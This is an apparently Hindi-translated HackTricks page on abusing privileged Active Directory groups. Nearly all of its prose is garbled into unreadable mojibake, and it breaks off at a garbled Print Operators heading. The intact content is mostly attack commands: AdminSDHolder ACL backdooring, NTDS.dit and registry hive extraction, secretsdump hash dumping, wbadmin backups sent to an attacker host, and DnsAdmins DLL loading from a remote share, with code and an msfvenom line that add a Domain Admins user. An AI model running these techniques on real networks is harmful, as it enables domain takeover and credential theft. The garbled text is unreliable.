Privileged Groups

Support HackTricks

Well Known groups with administration privileges

  • Administrators

  • Domain Admins

  • Enterprise Admins

Account Operators

рдпрд╣ рд╕рдореВрд╣ рдЙрди рдЦрд╛рддреЛрдВ рдФрд░ рд╕рдореВрд╣реЛрдВ рдХреЛ рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдХреНрд╖рдо рд╣реИ рдЬреЛ рдбреЛрдореЗрди рдкрд░ рдкреНрд░рд╢рд╛рд╕рдХ рдирд╣реАрдВ рд╣реИрдВред рдЗрд╕рдХреЗ рдЕрддрд┐рд░рд┐рдХреНрдд, рдпрд╣ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ (DC) рдкрд░ рд╕реНрдерд╛рдиреАрдп рд▓реЙрдЧрд┐рди рдХреЛ рд╕рдХреНрд╖рдо рдХрд░рддрд╛ рд╣реИред

рдЗрд╕ рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдпреЛрдВ рдХреА рдкрд╣рдЪрд╛рди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХреА рдЬрд╛рддреА рд╣реИ:

Get-NetGroupMember -Identity "Account Operators" -Recurse

рдирдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рдЬреЛрдбрд╝рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рд╣реИ, рд╕рд╛рде рд╣реА DC01 рдкрд░ рд╕реНрдерд╛рдиреАрдп рд▓реЙрдЧрд┐рди рднреАред

AdminSDHolder рд╕рдореВрд╣

AdminSDHolder рд╕рдореВрд╣ рдХреА рдПрдХреНрд╕реЗрд╕ рдХрдВрдЯреНрд░реЛрд▓ рд▓рд┐рд╕реНрдЯ (ACL) рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреЗ рднреАрддрд░ рд╕рднреА "рд╕рдВрд░рдХреНрд╖рд┐рдд рд╕рдореВрд╣реЛрдВ" рдХреЗ рд▓рд┐рдП рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╕реЗрдЯ рдХрд░рддреА рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдЙрдЪреНрдЪ-privilege рд╕рдореВрд╣ рд╢рд╛рдорд┐рд▓ рд╣реИрдВред рдпрд╣ рддрдВрддреНрд░ рдЗрди рд╕рдореВрд╣реЛрдВ рдХреА рд╕реБрд░рдХреНрд╖рд╛ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдЕрдирдзрд┐рдХреГрдд рд╕рдВрд╢реЛрдзрдиреЛрдВ рдХреЛ рд░реЛрдХрд╛ рдЬрд╛ рд╕рдХреЗред

рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдЗрд╕рдХреЛ AdminSDHolder рд╕рдореВрд╣ рдХреА ACL рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдХреЗ рднреБрдирд╛рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдПрдХ рдорд╛рдирдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдкреВрд░реНрдг рдЕрдиреБрдорддрд┐рдпрд╛рдБ рдорд┐рд▓ рдЬрд╛рдПрдБрдЧреАред рдЗрд╕рд╕реЗ рдЙрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рд╕рднреА рд╕рдВрд░рдХреНрд╖рд┐рдд рд╕рдореВрд╣реЛрдВ рдкрд░ рдкреВрд░реНрдг рдирд┐рдпрдВрддреНрд░рдг рдорд┐рд▓ рдЬрд╛рдПрдЧрд╛ред рдпрджрд┐ рдЗрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╕рдВрд╢реЛрдзрд┐рдд рдпрд╛ рд╣рдЯрд╛ рджреА рдЬрд╛рддреА рд╣реИрдВ, рддреЛ рдЙрдиреНрд╣реЗрдВ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рдбрд┐рдЬрд╝рд╛рдЗрди рдХреЗ рдХрд╛рд░рдг рдПрдХ рдШрдВрдЯреЗ рдХреЗ рднреАрддрд░ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдкреБрдирд░реНрд╕реНрдерд╛рдкрд┐рдд рдХрд░ рджрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред

рд╕рджрд╕реНрдпреЛрдВ рдХреА рд╕рдореАрдХреНрд╖рд╛ рдХрд░рдиреЗ рдФрд░ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрджреЗрд╢ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ:

Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}

рдПрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЙрдкрд▓рдмреНрдз рд╣реИ рдЬреЛ рдкреБрдирд░реНрд╕реНрдерд╛рдкрди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рддреЗрдЬ рдХрд░рддреА рд╣реИ: Invoke-ADSDPropagation.ps1.

рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП, ired.team рдкрд░ рдЬрд╛рдПрдВред

AD рд░реАрд╕рд╛рдЗрдХреНрд▓ рдмрд┐рди

рдЗрд╕ рд╕рдореВрд╣ рдореЗрдВ рд╕рджрд╕реНрдпрддрд╛ рд╣рдЯрд╛рдП рдЧрдП Active Directory рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдХреЛ рдкрдврд╝рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИ, рдЬреЛ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рдХрдЯ рдХрд░ рд╕рдХрддреА рд╣реИ:

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

Domain Controller Access

DC рдкрд░ рдлрд╝рд╛рдЗрд▓реЛрдВ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рд╣реИ рдЬрдм рддрдХ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ Server Operators рд╕рдореВрд╣ рдХрд╛ рд╣рд┐рд╕реНрд╕рд╛ рди рд╣реЛ, рдЬреЛ рдкрд╣реБрдБрдЪ рдХреЗ рд╕реНрддрд░ рдХреЛ рдмрджрд▓рддрд╛ рд╣реИред

Privilege Escalation

Sysinternals рд╕реЗ PsService рдпрд╛ sc рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ, рдХреЛрдИ рд╕реЗрд╡рд╛ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХрд╛ рдирд┐рд░реАрдХреНрд╖рдг рдФрд░ рд╕рдВрд╢реЛрдзрди рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, Server Operators рд╕рдореВрд╣ рдХреЗ рдкрд╛рд╕ рдХреБрдЫ рд╕реЗрд╡рд╛рдУрдВ рдкрд░ рдкреВрд░реНрдг рдирд┐рдпрдВрддреНрд░рдг рд╣реЛрддрд╛ рд╣реИ, рдЬреЛ рдордирдорд╛рдиреЗ рдЖрджреЗрд╢реЛрдВ рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдФрд░ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ:

C:\> .\PsService.exe security AppReadiness

рдпрд╣ рдХрдорд╛рдВрдб рджрд┐рдЦрд╛рддрд╛ рд╣реИ рдХрд┐ Server Operators рдХреЗ рдкрд╛рд╕ рдкреВрд░реНрдг рдкрд╣реБрдВрдЪ рд╣реИ, рдЬреЛ рдЙрдЪреНрдЪрд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд▓рд┐рдП рд╕реЗрд╡рд╛рдУрдВ рдореЗрдВ рд╣реЗрд░рдлреЗрд░ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред

рдмреИрдХрдЕрдк рдСрдкрд░реЗрдЯрд░

Backup Operators рд╕рдореВрд╣ рдореЗрдВ рд╕рджрд╕реНрдпрддрд╛ DC01 рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рддрдХ рдкрд╣реБрдВрдЪ рдкреНрд░рджрд╛рди рдХрд░рддреА рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕рдореЗрдВ SeBackup рдФрд░ SeRestore рд╡рд┐рд╢реЗрд╖рддрд╛рдПрдБ рд╣реИрдВред рдпреЗ рд╡рд┐рд╢реЗрд╖рддрд╛рдПрдБ рдлрд╝реЛрд▓реНрдбрд░ рдЯреНрд░реИрд╡рд░реНрд╕рд▓, рд▓рд┐рд╕реНрдЯрд┐рдВрдЧ, рдФрд░ рдлрд╝рд╛рдЗрд▓ рдХреЙрдкреА рдХрд░рдиреЗ рдХреА рдХреНрд╖рдорддрд╛рдПрдБ рд╕рдХреНрд╖рдо рдХрд░рддреА рд╣реИрдВ, рдпрд╣рд╛рдВ рддрдХ рдХрд┐ рд╕реНрдкрд╖реНрдЯ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЗ рдмрд┐рдирд╛, FILE_FLAG_BACKUP_SEMANTICS рдзреНрд╡рдЬ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗред рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИред

рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдпреЛрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ:

Get-NetGroupMember -Identity "Backup Operators" -Recurse

рд╕реНрдерд╛рдиреАрдп рд╣рдорд▓рд╛

рдЗрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ рд▓рд╛рдн рдЙрдард╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЪрд░рдгреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ:

  1. рдЖрд╡рд╢реНрдпрдХ рдкреБрд╕реНрддрдХрд╛рд▓рдп рдЖрдпрд╛рдд рдХрд░реЗрдВ:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
  1. SeBackupPrivilege рдХреЛ рд╕рдХреНрд╖рдо рдХрд░реЗрдВ рдФрд░ рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░реЗрдВ:

Set-SeBackupPrivilege
Get-SeBackupPrivilege
  1. рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдУрдВ рд╕реЗ рдлрд╝рд╛рдЗрд▓реЛрдВ рддрдХ рдкрд╣реБрдБрдЪреЗрдВ рдФрд░ рдЙрдиреНрд╣реЗрдВ рдХреЙрдкреА рдХрд░реЗрдВ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП:

dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite

AD Attack

рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рдХреА рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рддрдХ рд╕реАрдзреА рдкрд╣реБрдБрдЪ NTDS.dit рдбреЗрдЯрд╛рдмреЗрд╕ рдХреА рдЪреЛрд░реА рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдФрд░ рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдХреЗ рд╕рднреА NTLM рд╣реИрд╢ рд╣реЛрддреЗ рд╣реИрдВред

Using diskshadow.exe

  1. C рдбреНрд░рд╛рдЗрд╡ рдХреА рдПрдХ рд╢реИрдбреЛ рдХреЙрдкреА рдмрдирд╛рдПрдВ:

diskshadow.exe
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% F:
end backup
exit
  1. NTDS.dit рдХреЛ рд╢реИрдбреЛ рдХреЙрдкреА рд╕реЗ рдХреЙрдкреА рдХрд░реЗрдВ:

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

рд╡реИрдХрд▓реНрдкрд┐рдХ рд░реВрдк рд╕реЗ, рдлрд╝рд╛рдЗрд▓ рдХреЙрдкреА рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП robocopy рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:

robocopy /B F:\Windows\NTDS .\ntds ntds.dit
  1. рд╣реИрд╢ рдкреБрдирд░реНрдкреНрд░рд╛рдкреНрддрд┐ рдХреЗ рд▓рд┐рдП SYSTEM рдФрд░ SAM рдирд┐рдХрд╛рд▓реЗрдВ:

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
  1. NTDS.dit рд╕реЗ рд╕рднреА рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Using wbadmin.exe

  1. рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рдкрд░ SMB рд╕рд░реНрд╡рд░ рдХреЗ рд▓рд┐рдП NTFS рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рд╕реЗрдЯ рдХрд░реЗрдВ рдФрд░ рд▓рдХреНрд╖рд┐рдд рдорд╢реАрди рдкрд░ SMB рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХреИрд╢ рдХрд░реЗрдВред

  2. рд╕рд┐рд╕реНрдЯрдо рдмреИрдХрдЕрдк рдФрд░ NTDS.dit рдирд┐рд╖реНрдХрд░реНрд╖рдг рдХреЗ рд▓рд┐рдП wbadmin.exe рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:

net use X: \\<AttackIP>\sharename /user:smbuser password
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
wbadmin get versions
echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

рд╡реНрдпрд╛рд╡рд╣рд╛рд░рд┐рдХ рдкреНрд░рджрд░реНрд╢рди рдХреЗ рд▓рд┐рдП, рджреЗрдЦреЗрдВ DEMO VIDEO WITH IPPSEC.

DnsAdmins

DnsAdmins рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдп рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ DNS рд╕рд░реНрд╡рд░ рдкрд░ SYSTEM рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдПрдХ рдордирдорд╛рдирд╛ DLL рд▓реЛрдб рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬреЛ рдЕрдХреНрд╕рд░ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░реНрд╕ рдкрд░ рд╣реЛрд╕реНрдЯ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рдХреНрд╖рдорддрд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╢реЛрд╖рдг рд╕рдВрднрд╛рд╡рдирд╛рдУрдВ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред

DnsAdmins рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдпреЛрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:

Get-NetGroupMember -Identity "DnsAdmins" -Recurse

рдордирдорд╛рдиреЗ DLL рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ

рд╕рджрд╕реНрдп DNS рд╕рд░реНрд╡рд░ рдХреЛ рдордирдорд╛рдирд╛ DLL (рдпрд╛ рддреЛ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ рдпрд╛ рдХрд┐рд╕реА рджреВрд░рд╕реНрде рд╢реЗрдпрд░ рд╕реЗ) рд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
// Modify DLL to add user
DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
{
system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
}
// Generate DLL with msfvenom
msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll

DNS рд╕реЗрд╡рд╛ рдХреЛ рдкреБрдирд░рд╛рд░рдВрдн рдХрд░рдирд╛ (рдЬрд┐рд╕рдХреЗ рд▓рд┐рдП рдЕрддрд┐рд░рд┐рдХреНрдд рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛ рд╕рдХрддреА рд╣реИ) DLL рдХреЛ рд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╣реИ:

sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns

For more details on this attack vector, refer to ired.team.

Mimilib.dll

рдпрд╣ рднреА рд╕рдВрднрд╡ рд╣реИ рдХрд┐ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП mimilib.dll рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рдП, рдЗрд╕реЗ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдХрдорд╛рдВрдб рдпрд╛ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдВрд╢реЛрдзрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПред рдЗрд╕ рдкреЛрд╕реНрдЯ рдХреЛ рджреЗрдЦреЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдПред

WPAD Record for MitM

DnsAdmins DNS рд░рд┐рдХреЙрд░реНрдб рдХреЛ рдореИрди-рдЗрди-рдж-рдорд┐рдбрд▓ (MitM) рд╣рдорд▓реЛрдВ рдХреЛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╣реЗрд░рдлреЗрд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рд╡реИрд╢реНрд╡рд┐рдХ рдХреНрд╡реЗрд░реА рдмреНрд▓реЙрдХ рд╕реВрдЪреА рдХреЛ рдЕрдХреНрд╖рдо рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж WPAD рд░рд┐рдХреЙрд░реНрдб рдмрдирд╛рдХрд░ред рд╕реНрдкреВрдлрд┐рдВрдЧ рдФрд░ рдиреЗрдЯрд╡рд░реНрдХ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП Responder рдпрд╛ Inveigh рдЬреИрд╕реЗ рдЙрдкрдХрд░рдгреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

### Event Log Readers рд╕рджрд╕реНрдп рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧреНрд╕ рддрдХ рдкрд╣реБрдБрдЪ рд╕рдХрддреЗ рд╣реИрдВ, рд╕рдВрднрд╛рд╡рд┐рдд рд░реВрдк рд╕реЗ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рдЬрд╛рдирдХрд╛рд░реА рдЬреИрд╕реЗ рдХрд┐ рдкреНрд▓реЗрдирдЯреЗрдХреНрд╕реНрдЯ рдкрд╛рд╕рд╡рд░реНрдб рдпрд╛ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди рд╡рд┐рд╡рд░рдг рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВ:

# Get members and search logs for sensitive information
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}

Exchange Windows Permissions

рдпрд╣ рд╕рдореВрд╣ рдбреЛрдореЗрди рдСрдмреНрдЬреЗрдХреНрдЯ рдкрд░ DACLs рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рд╕рдВрднрд╛рд╡рд┐рдд рд░реВрдк рд╕реЗ DCSync рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рджрд╛рди рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕ рд╕рдореВрд╣ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдХреЗ рд▓рд┐рдП рддрдХрдиреАрдХреЛрдВ рдХрд╛ рд╡рд┐рд╡рд░рдг Exchange-AD-Privesc GitHub рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдореЗрдВ рджрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

# List members
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse

Hyper-V Administrators

Hyper-V Administrators рдХреЛ Hyper-V рдкрд░ рдкреВрд░реНрдг рдкрд╣реБрдВрдЪ рдкреНрд░рд╛рдкреНрдд рд╣реЛрддреА рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рд╡рд░реНрдЪреБрдЕрд▓рд╛рдЗрдЬреНрдб рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░реНрд╕ рдкрд░ рдирд┐рдпрдВрддреНрд░рдг рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕рдореЗрдВ рд▓рд╛рдЗрд╡ DCs рдХреЛ рдХреНрд▓реЛрди рдХрд░рдирд╛ рдФрд░ NTDS.dit рдлрд╝рд╛рдЗрд▓ рд╕реЗ NTLM рд╣реИрд╢ рдирд┐рдХрд╛рд▓рдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИред

Exploitation Example

Firefox рдХрд╛ Mozilla Maintenance Service Hyper-V Administrators рджреНрд╡рд╛рд░рд╛ SYSTEM рдХреЗ рд░реВрдк рдореЗрдВ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╢реЛрд╖рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕рдореЗрдВ рдПрдХ рд╕реБрд░рдХреНрд╖рд┐рдд SYSTEM рдлрд╝рд╛рдЗрд▓ рдХреЗ рд▓рд┐рдП рдПрдХ рд╣рд╛рд░реНрдб рд▓рд┐рдВрдХ рдмрдирд╛рдирд╛ рдФрд░ рдЗрд╕реЗ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓ рд╕реЗ рдмрджрд▓рдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИ:

# Take ownership and start the service
takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
sc.exe start MozillaMaintenance

Note: рд╣рд╛рд░реНрдб рд▓рд┐рдВрдХ рд╢реЛрд╖рдг рд╣рд╛рд▓ рдХреЗ Windows рдЕрдкрдбреЗрдЯ рдореЗрдВ рдХрдо рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

рд╕рдВрдЧрдарди рдкреНрд░рдмрдВрдзрди

рдЙрди рд╡рд╛рддрд╛рд╡рд░рдгреЛрдВ рдореЗрдВ рдЬрд╣рд╛рдВ Microsoft Exchange рддреИрдирд╛рдд рд╣реИ, рдПрдХ рд╡рд┐рд╢реЗрд╖ рд╕рдореВрд╣ рдЬрд┐рд╕реЗ рд╕рдВрдЧрдарди рдкреНрд░рдмрдВрдзрди рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИ, рдорд╣рддреНрд╡рдкреВрд░реНрдг рдХреНрд╖рдорддрд╛рдПрдБ рд░рдЦрддрд╛ рд╣реИред рдпрд╣ рд╕рдореВрд╣ рд╕рднреА рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рдореЗрд▓рдмреЙрдХреНрд╕реЛрдВ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рд╣реИ рдФрд░ 'Microsoft Exchange рд╕реБрд░рдХреНрд╖рд╛ рд╕рдореВрд╣реЛрдВ' рд╕рдВрдЧрдардирд╛рддреНрдордХ рдЗрдХрд╛рдИ (OU) рдкрд░ рдкреВрд░реНрдг рдирд┐рдпрдВрддреНрд░рдг рдмрдирд╛рдП рд░рдЦрддрд╛ рд╣реИред рдЗрд╕ рдирд┐рдпрдВрддреНрд░рдг рдореЗрдВ Exchange Windows Permissions рд╕рдореВрд╣ рд╢рд╛рдорд┐рд▓ рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╢реЛрд╖рдг рдФрд░ рдХрдорд╛рдВрдб

рдкреНрд░рд┐рдВрдЯ рдСрдкрд░реЗрдЯрд░

